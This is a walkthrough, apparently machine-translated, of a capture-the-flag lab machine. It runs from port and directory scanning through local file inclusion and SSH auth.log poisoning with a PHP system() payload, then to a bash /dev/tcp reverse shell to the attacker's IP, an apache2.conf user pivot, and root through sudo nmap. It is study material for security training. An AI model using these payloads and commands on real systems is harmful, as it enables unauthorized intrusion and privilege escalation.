Infiltrate ideas ：

nmap scanning ----dirb Scan the website directory ----ffuf Blast url Parameters ---- utilize auth.log and LFI Get a bounce shell---- modify /etc/apache2/apache2.conf get mahakal Of shell----sudo nmap Raise the right

environmental information ：

Drone aircraft ：192.168.101.78

attack ：192.168.101.34

Specific steps ：

1、nmap scanning

sudo nmap -sV -sC -p- 192.168.101.78

2、dirb Scan the website directory

​dirb http://192.168.101.78

Scan to directory http://192.168.101.78/console/

The browser accesses the directory , Documents found file.php

Intuition tells me that there may be a file containing loopholes

3、ffuf Blast url Parameters

​ffuf -u 'http://192.168.101.78/console/file.php?FUZZ=../../../../etc/passwd' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fs 0

among FUZZ It is the placeholder string of the parameter name that needs brute force cracking

Blast out the parameter name file

Browser access http://192.168.101.78/console/file.php?file=../../../../etc/passwd

You can see the of the target /etc/passwd The contents of the document

4、 Use user authentication logs and LFI Get a bounce shell

Browser access http://192.168.101.78/console/file.php?file=../../../../var/log/auth.log, Found to have access

Try to use natraj Conduct ssh Sign in , And enter the wrong password （ I don't know the correct password anyway ）

ssh [email protected]

Then use the browser to access http://192.168.101.78/console/file.php?file=../../../../var/log/auth.log, Find out /var/log/auth.log Recorded in ssh Login user name

So it can be ssh When logging in php Code is inserted as user name , such php The code will be written /var/log/auth.log, The Local File Inclusion Vulnerability of the website includes /var/log/auth.log It will trigger writing php Code execution .

ssh Log in to the target , The user is called "<?php system(\$_GET[xiannv]); ?>", Enter the password casually

ssh "<?php system(\$_GET[xiannv]); ?>"@192.168.101.78

Browser access http://192.168.101.78/console/file.php?file=../../../../var/log/auth.log&xiannv=id

You can get id Command execution results , Indicates inserted php Code effective

Next, monitor on the attack plane 8888 port

nc -nlvp 8888

It is then accessed in a browser

http://192.168.101.78/console/file.php?file=../../../../var/log/auth.log&xiannv=bash%20-c%20%27exec%20bash%20-i%20%26%3E%2Fdev%2Ftcp%2F192.168.101.34%2F8888%20%3C%261%27

among xiannv Parameter values for url Before coding is bash -c 'exec bash -i &>/dev/tcp/192.168.101.34/8888 <&1'

Get rebound shell

5、 modify /etc/apache2/apache2.conf get mahakal Of shell

Download from the attacker linpeas.sh

First attack the aircraft linpeas.sh From... Under the directory http service , such as

python2 -m SimpleHTTPServer 80

Then the target shell Execute the following command , Download and execute linpeas.sh, Check for possible claims

[email protected]:/tmp$ wget http://192.168.101.34/linpeas.sh
[email protected]:/tmp$ chmod +x linpeas.sh
[email protected]:/tmp$ ./linpeas.sh

linpeas.sh Discover file permissions 777 The file of /etc/apache2/apache2.conf, The document is apache2 Primary profile for

In this file User Parameter sets the user of the child process that actually provides the service ,Group Parameter sets the user group of the running sub process of the service .

The original values of these two parameters are as follows , You can modify the values of these two parameters in step 4 The rebound obtained when shell Become other users and groups .

User ${APACHE_RUN_USER}

Group ${APACHE_RUN_GROUP}

Here I tried natraj、root、mahakal, Only mahakal Sure .

Change to natraj Although you can get natraj Rebound of shell, but natraj No one can sudo The order of （ Or is it sudo -l Need a password , Forget which of these two reasons -_-|||）;

Change to root When , The main page （http://192.168.101.78） Can open the , however http://192.168.101.78/console/file.php Cannot be opened , I don't know why , I guess there may be some security restrictions .

Because the target cannot be executed vim, So I put /etc/apache2/apache2.conf Copy to the attacker and modify User and Group by mahakal, And save

User mahakal

Group mahakal

Enter on the target /tmp Catalog , Download the modified... From the attacker apache2.conf, And copy it to /etc/apache2/apache2.conf

[email protected]:/tmp$ wget http://192.168.101.34/apache2.conf
[email protected]:/tmp$ cp /tmp/apache2.conf /etc/apache2/apache2.conf

Then I wanted to restart apache2 Of , however www-data It seems that the user does not have permission in this regard , Second, restart the system , but www-data Users also do not have permission in this regard , Only in vmware Restart the virtual machine on

Repeat the steps after restarting 4 Get a rebound shell The operation of , obtain mahakal Rebound of shell.

perform sudo -l, Find out mahakal Sure sudo perform nmap command

6、sudo nmap Raise the right

stay GTFOBins It's on the Internet nmap Sure sudo Raise the right

nmap | GTFOBins

According to the instructions of the website, enter the following commands in sequence

[email protected]:/var/www/html/console$ TF=$(mktemp)
[email protected]:/var/www/html/console$ echo 'os.execute("/bin/bash")' > $TF
[email protected]:/var/www/html/console$ sudo nmap --script=$TF

get root User shell

find proof：/root/root.txt